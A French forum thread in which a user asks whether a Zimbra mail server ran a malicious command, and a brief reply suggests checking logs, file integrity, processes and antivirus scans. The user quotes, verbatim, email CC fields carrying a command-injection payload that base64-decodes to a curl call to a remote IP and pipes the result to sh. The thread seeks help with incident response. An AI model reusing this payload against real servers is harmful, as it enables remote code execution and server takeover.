rospionne

Bonjour,

J'ai reçu 4 mails contenant dans le champ CC un code bizard (Veuillez ne pas exécuter ce code, risque viral fort) :
CC: ppp`echo${IFS}Li4vLi4vY29tbW9uL2Jpbi9jdXJsIGh0dHA6Ly83OS4xMjQuNDkuODY6NDQzL2dwa3FyZmFwcWdxZ2Z0Zm52dmR4dnp5bm1yc2xsc2Np|base64${IFS}-d|sh`[email protected],ppp`echo${IFS}L29wdC96aW1icmEvY29tbW9uL2Jpbi9jdXJsIGh0dHA6Ly83OS4xMjQuNDkuODY6NDQzL2dwa3FyZmFwcWdxZ2Z0Zm52dmR4dnp5bm1yc2xsc2Np|base64${IFS}-d|sh`[email protected]
Comment savoir si le serveur Zimbra a exécuter ou non ce genre de code ?

Merci d'avance.
« Modifié: 01 October 2024 09:10:53 par rospionne »

primagenike

Bonjour,
Pour savoir si le serveur Zimbra a exécuté ce code, vous devez vérifier les journaux du serveur. Recherchez des entrées suspectes liées à des commandes shell (sh) ou des décryptages base64. Il serait également judicieux de vérifier l'intégrité des fichiers système et de surveiller les processus en cours. Enfin, effectuez une analyse antivirus pour détecter d'éventuelles infections.

Merci.